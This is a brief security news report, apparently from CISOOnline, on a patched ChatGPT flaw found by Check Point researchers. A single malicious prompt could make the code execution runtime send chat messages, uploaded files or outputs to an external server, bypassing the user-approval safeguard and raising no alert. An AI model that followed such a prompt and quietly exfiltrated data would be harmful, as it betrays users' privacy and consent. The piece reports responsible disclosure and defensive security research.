CISOOnline

OpenAI patches twin leaks as Codex slips and ChatGPT spills

ChatGPT’s hidden outbound channel leaks user data

OpenAI has reportedly fixed a parallel bug in ChatGPT that goes beyond credential theft. Check Point researchers uncovered a hidden outbound communication path in ChatGPT’s code execution runtime that could be triggered with a single malicious prompt.

This channel successfully bypassed the platform’s expected safeguards around external data sharing. Instead of requiring explicit user approval, the runtime could transmit data, such as chat messages, uploaded files, or generated outputs, to an external server without any visible alerts.

CheckPoint researchers demonstrated crafting a prompt that leverages this behavior, allowing the runtime to package and transmit private chat data to an external server. Basically, a normal-looking conversation could be turned into a covert data exfiltration pipeline.



Source link